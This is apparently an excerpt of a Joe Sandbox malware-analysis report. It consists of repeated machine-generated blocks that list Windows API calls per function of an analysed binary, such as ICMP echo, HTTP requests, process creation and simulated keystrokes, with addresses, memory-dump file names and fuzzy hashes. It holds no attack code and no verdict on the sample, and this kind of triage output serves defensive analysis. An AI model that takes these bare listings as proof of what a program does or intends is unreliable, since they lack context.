                                                                    • Instruction Fuzzy Hash: FF6191B06083129FD711DF94C888B6EBBE4AF85754F04886EF9C19B291CB74ED44CB92
                                                                    APIs
                                                                    • WSAStartup.WSOCK32(00000101,?), ref: 01045793
                                                                    • inet_addr.WSOCK32(?,?,?), ref: 010457D8
                                                                    • gethostbyname.WSOCK32(?), ref: 010457E4
                                                                    • IcmpCreateFile.IPHLPAPI ref: 010457F2
                                                                    • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 01045862
                                                                    • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 01045878
                                                                    • IcmpCloseHandle.IPHLPAPI(00000000), ref: 010458ED
                                                                    • WSACleanup.WSOCK32 ref: 010458F3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                    • String ID: Ping
                                                                    • API String ID: 1028309954-2246546115
                                                                    • Opcode ID: c98913a9d5755505d706e08127d2c00c1c72803a43d816948557b86137021198
                                                                    • Instruction ID: 544125c872351bd07cbfa5ce78f4a8aa0c47eccd8abbaf747c220b27f8f9408c
                                                                    • Opcode Fuzzy Hash: c98913a9d5755505d706e08127d2c00c1c72803a43d816948557b86137021198
                                                                    • Instruction Fuzzy Hash: FC516E716043019FEB21EF68DC85B2A7BE4EF49720F04456AF996EB291DB74E900DB42
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0103B4D0
                                                                    • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0103B546
                                                                    • GetLastError.KERNEL32 ref: 0103B550
                                                                    • SetErrorMode.KERNEL32(00000000,READY), ref: 0103B5BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Error$Mode$DiskFreeLastSpace
                                                                    • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                    • API String ID: 4194297153-14809454
                                                                    • Opcode ID: 56b5cd28c616e1d3bc579222d024fb73d49ec2235eeade5d7d4c462e7c7dec67
                                                                    • Instruction ID: e7c64cd5fd1b297d376fc887f1f9cd862ecddfcda0148b41e146a4a622d0c0be
                                                                    • Opcode Fuzzy Hash: 56b5cd28c616e1d3bc579222d024fb73d49ec2235eeade5d7d4c462e7c7dec67
                                                                    • Instruction Fuzzy Hash: 9631C435A00205EFDB10EF68C885FAEBBB8FF85314F44815AE682DB2D1DB759A01CB41
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 01029014
                                                                    • GetDlgCtrlID.USER32 ref: 0102901F
                                                                    • GetParent.USER32 ref: 0102903B
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 0102903E
                                                                    • GetDlgCtrlID.USER32(?), ref: 01029047
                                                                    • GetParent.USER32(?), ref: 01029063
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 01029066
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 977716ba1b5d4acd6a1ea54fc95cfdcc3f55a493fb736001296379723ebc1c8d
                                                                    • Instruction ID: 83d862c6acafcf2b7e50e9b03003548b17ed7d8a94998724de442db67bc7559e
                                                                    • Opcode Fuzzy Hash: 977716ba1b5d4acd6a1ea54fc95cfdcc3f55a493fb736001296379723ebc1c8d
                                                                    • Instruction Fuzzy Hash: 1A210370A00219BFDF10ABA4CC84EFEBBB5EF49310F00015AF9A1972A1DB3E5418DB20
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 0102AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0102AABC
                                                                    • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 010290FD
                                                                    • GetDlgCtrlID.USER32 ref: 01029108
                                                                    • GetParent.USER32 ref: 01029124
                                                                    • SendMessageW.USER32(00000000,?,00000111,?), ref: 01029127
                                                                    • GetDlgCtrlID.USER32(?), ref: 01029130
                                                                    • GetParent.USER32(?), ref: 0102914C
                                                                    • SendMessageW.USER32(00000000,?,?,00000111), ref: 0102914F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                                    • String ID: ComboBox$ListBox
                                                                    • API String ID: 1536045017-1403004172
                                                                    • Opcode ID: 79ebb097f371f1d1aabf7b63f4d955c0b7acef9d0143eceebfe83b15a94fc206
                                                                    • Instruction ID: 81079a0b8e0a87790135ae729015f38da67b15fb5b9f58a55d16c2a40cbbb655
                                                                    • Opcode Fuzzy Hash: 79ebb097f371f1d1aabf7b63f4d955c0b7acef9d0143eceebfe83b15a94fc206
                                                                    • Instruction Fuzzy Hash: 9321C574A00219BBDF11ABA5CC85EFEBBB5EF48300F10405AF991972A5DB7E9419DB20
                                                                    APIs
                                                                    • GetParent.USER32 ref: 0102916F
                                                                    • GetClassNameW.USER32(00000000,?,00000100), ref: 01029184
                                                                    • _wcscmp.LIBCMT ref: 01029196
                                                                    • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 01029211
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ClassMessageNameParentSend_wcscmp
                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                    • API String ID: 1704125052-3381328864
                                                                    • Opcode ID: 37ac460dc6d41c8ad4a78e28ee8ebae1b3a6d56794bd463661746080a2d5e6dd
                                                                    • Instruction ID: d6be6afb31adff16393be1cb8745aeae8f02233d404d4531ef08182643489310
                                                                    • Opcode Fuzzy Hash: 37ac460dc6d41c8ad4a78e28ee8ebae1b3a6d56794bd463661746080a2d5e6dd
                                                                    • Instruction Fuzzy Hash: 57115C3624833BB9FB213529DC0ADB737DC9F05324F30005AFAD0E40A7FE6655115694
                                                                    APIs
                                                                    • VariantInit.OLEAUT32(?), ref: 010488D7
                                                                    • CoInitialize.OLE32(00000000), ref: 01048904
                                                                    • CoUninitialize.OLE32 ref: 0104890E
                                                                    • GetRunningObjectTable.OLE32(00000000,?), ref: 01048A0E
                                                                    • SetErrorMode.KERNEL32(00000001,00000029), ref: 01048B3B
                                                                    • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,01062C0C), ref: 01048B6F
                                                                    • CoGetObject.OLE32(?,00000000,01062C0C,?), ref: 01048B92
                                                                    • SetErrorMode.KERNEL32(00000000), ref: 01048BA5
                                                                    • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 01048C25
                                                                    • VariantClear.OLEAUT32(?), ref: 01048C35
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                    • String ID:
                                                                    • API String ID: 2395222682-0
                                                                    • Opcode ID: 9cd3b032615dca1fa8dde0fbe7dc0a7c158bf22fbba958e70f0dbf433967fab8
                                                                    • Instruction ID: 8b49a6f536a067ee5c19482d02b975da4316a996ef7057b09bb2d566958086c0
                                                                    • Opcode Fuzzy Hash: 9cd3b032615dca1fa8dde0fbe7dc0a7c158bf22fbba958e70f0dbf433967fab8
                                                                    • Instruction Fuzzy Hash: 5BC137B1608305AFD700EFA8C88492BBBE9FF89348F04496DF9859B251D771ED05CB52
                                                                    APIs
                                                                    • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 01037A6C
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ArraySafeVartype
                                                                    • String ID:
                                                                    • API String ID: 1725837607-0
                                                                    • Opcode ID: 0fc466f6acadb2853617c115e4ae98969e3560c4d9c548b0525598db0f704119
                                                                    • Instruction ID: cefe169dcb8f44ebc7db5ed35ce67a5863ff7893cd6ef78e81ae5e58780ff240
                                                                    • Opcode Fuzzy Hash: 0fc466f6acadb2853617c115e4ae98969e3560c4d9c548b0525598db0f704119
                                                                    • Instruction Fuzzy Hash: CCB1A4B591020A9FDB11DF98C884BBEBBF8FF89321F144469E681E7251D778E941CB90
                                                                    APIs
                                                                    • GetCurrentThreadId.KERNEL32 ref: 010311F0
                                                                    • GetForegroundWindow.USER32(00000000,?,?,?,?,?,01030268,?,00000001), ref: 01031204
                                                                    • GetWindowThreadProcessId.USER32(00000000), ref: 0103120B
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 0103121A
                                                                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 0103122C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 01031245
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,01030268,?,00000001), ref: 01031257
                                                                    • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 0103129C
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 010312B1
                                                                    • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,01030268,?,00000001), ref: 010312BC
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                    • String ID:
                                                                    • API String ID: 2156557900-0
                                                                    • Opcode ID: 430487bd01c0fc19bae7454d6f57ad9fb13bc79bca65e4dfccf092308c749ac4
                                                                    • Instruction ID: 038a33ddc69baf524bb2d5f70655cc326af77731eb49a0deeb01e1a02aa74772
                                                                    • Opcode Fuzzy Hash: 430487bd01c0fc19bae7454d6f57ad9fb13bc79bca65e4dfccf092308c749ac4
                                                                    • Instruction Fuzzy Hash: 4B318DB5600304BBEB319F68D898F6A7BEDBB8D311F108155F980C6186D7BE99508B60
                                                                    APIs
                                                                    • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00FDFAA6
                                                                    • OleUninitialize.OLE32(?,00000000), ref: 00FDFB45
                                                                    • UnregisterHotKey.USER32(?), ref: 00FDFC9C
                                                                    • DestroyWindow.USER32(?), ref: 010145D6
                                                                    • FreeLibrary.KERNEL32(?), ref: 0101463B
                                                                    • VirtualFree.KERNEL32(?,00000000,00008000), ref: 01014668
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                    • String ID: close all
                                                                    • API String ID: 469580280-3243417748
                                                                    • Opcode ID: fe49a0d824e376c4181582b4a751ec2f1c58e1890db9902a0b20639001dc91c3
                                                                    • Instruction ID: a1815a946f2a16ad4138bcf2bfbf6485a567f5f34cfc81a1398167db296d7321
                                                                    • Opcode Fuzzy Hash: fe49a0d824e376c4181582b4a751ec2f1c58e1890db9902a0b20639001dc91c3
                                                                    • Instruction Fuzzy Hash: 34A1BF31701212CFCB29EF14C994E69F7A5BF04714F1442AEE94AAB362CB38AD16DF51
                                                                    APIs
                                                                    • EnumChildWindows.USER32(?,0102A439), ref: 0102A377
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ChildEnumWindows
                                                                    • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                    • API String ID: 3555792229-1603158881
                                                                    • Opcode ID: ba3e22167ea244630445ddcf5d90a979a79528c9ecc5b524e1b8df4fad3a098f
                                                                    • Instruction ID: c42325796fcbd268e9e0d4afd1db017f385e8df2433f28742661e521682bc882
                                                                    • Opcode Fuzzy Hash: ba3e22167ea244630445ddcf5d90a979a79528c9ecc5b524e1b8df4fad3a098f
                                                                    • Instruction Fuzzy Hash: D9911630700626EBDB08EFA8C841BEDFBB5BF04310F54815AE9C9A7651DF346589DB90
                                                                    APIs
                                                                    • SetWindowLongW.USER32(?,000000EB), ref: 00FD2EAE
                                                                      • Part of subcall function 00FD1DB3: GetClientRect.USER32(?,?), ref: 00FD1DDC
                                                                      • Part of subcall function 00FD1DB3: GetWindowRect.USER32(?,?), ref: 00FD1E1D
                                                                      • Part of subcall function 00FD1DB3: ScreenToClient.USER32(?,?), ref: 00FD1E45
                                                                    • GetDC.USER32 ref: 0100CD32
                                                                    • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0100CD45
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0100CD53
                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0100CD68
                                                                    • ReleaseDC.USER32(?,00000000), ref: 0100CD70
                                                                    • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0100CDFB
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                    • String ID: U
                                                                    • API String ID: 4009187628-3372436214
                                                                    • Opcode ID: f71cd0e52c21a6cece7edcc8ef00a1d2c93b9a61e70286ffee0bd68f349ea4ac
                                                                    • Instruction ID: 045d05c335e8c1a7bb999026f5566b68ef82f06827ca55b3fbcda2102376f9b6
                                                                    • Opcode Fuzzy Hash: f71cd0e52c21a6cece7edcc8ef00a1d2c93b9a61e70286ffee0bd68f349ea4ac
                                                                    • Instruction Fuzzy Hash: 2C71C831500205DFEF629F68C984AEA7FB6FF48320F1843EBED955A296C7358841DB60
                                                                    APIs
                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 01041A50
                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 01041A7C
                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 01041ABE
                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 01041AD3
                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 01041AE0
                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 01041B10
                                                                    • InternetCloseHandle.WININET(00000000), ref: 01041B57
                                                                      • Part of subcall function 01042483: GetLastError.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 01042498
                                                                      • Part of subcall function 01042483: SetEvent.KERNEL32(?,?,01041817,00000000,00000000,00000001), ref: 010424AD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                                    • String ID:
                                                                    • API String ID: 2603140658-3916222277
                                                                    • Opcode ID: e2de2f33190a0c07037e9cdf5a7df8a871a27b5d17213bf43e035b2e48835ec4
                                                                    • Instruction ID: 31ff3214860385029943efdd99b4a2a4bfb8ac75aeb7810a8d797c6996a90237
                                                                    • Opcode Fuzzy Hash: e2de2f33190a0c07037e9cdf5a7df8a871a27b5d17213bf43e035b2e48835ec4
                                                                    • Instruction Fuzzy Hash: 60417FB1500219BFEB129F54CC89FFB7BACFF08354F004166FA859A141E775AA948BA0
                                                                    APIs
                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0105F910), ref: 01048D28
                                                                    • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0105F910), ref: 01048D5C
                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 01048ED6
                                                                    • SysFreeString.OLEAUT32(?), ref: 01048F00
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmp
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                    • String ID:
                                                                    • API String ID: 560350794-0
APIs
• _memset.LIBCMT ref: 0104F6B5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0104F848
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 0104F86C
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0104F8AC
• GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0104F8CE
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0104FA4A
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 0104FA7C
• CloseHandle.KERNEL32(?), ref: 0104FAAB
• CloseHandle.KERNEL32(?), ref: 0104FB22
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• String ID:
• API String ID: 4090791747-0
APIs
  • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,01033697,?), ref: 0103468B
  • Part of subcall function 0103466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,01033697,?), ref: 010346A4
  • Part of subcall function 01034A31: GetFileAttributesW.KERNEL32(?,0103370B), ref: 01034A32
• lstrcmpiW.KERNEL32(?,?), ref: 01034D40
• _wcscmp.LIBCMT ref: 01034D5A
• MoveFileW.KERNEL32(?,?), ref: 01034D75
Similarity
• API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
• String ID:
• API String ID: 793581249-0
APIs
• InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 010586FF
Similarity
• API ID: InvalidateRect
• String ID:
• API String ID: 634782764-0
APIs
• LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0100C2F7
• ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0100C319
• LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0100C331
• ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0100C34F
• SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0100C370
• DestroyIcon.USER32(00000000), ref: 0100C37F
• SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0100C39C
• DestroyIcon.USER32(?), ref: 0100C3AB
  • Part of subcall function 0105A4AF: DeleteObject.GDI32(00000000), ref: 0105A4E8
Similarity
• API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
• String ID:
• API String ID: 2819616528-0
APIs
  • Part of subcall function 0102A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0102A84C
  • Part of subcall function 0102A82C: GetCurrentThreadId.KERNEL32 ref: 0102A853
  • Part of subcall function 0102A82C: AttachThreadInput.USER32(00000000,?,01029683,?,00000001), ref: 0102A85A
• MapVirtualKeyW.USER32(00000025,00000000), ref: 0102968E
• PostMessageW.USER32(?,00000100,00000025,00000000), ref: 010296AB
• Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 010296AE
• MapVirtualKeyW.USER32(00000025,00000000), ref: 010296B7
• PostMessageW.USER32(?,00000100,00000027,00000000), ref: 010296D5
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 010296D8
• MapVirtualKeyW.USER32(00000025,00000000), ref: 010296E1
• PostMessageW.USER32(?,00000101,00000027,00000000), ref: 010296F8
• Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 010296FB
Similarity
• API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
• String ID:
• API String ID: 2014098862-0
APIs
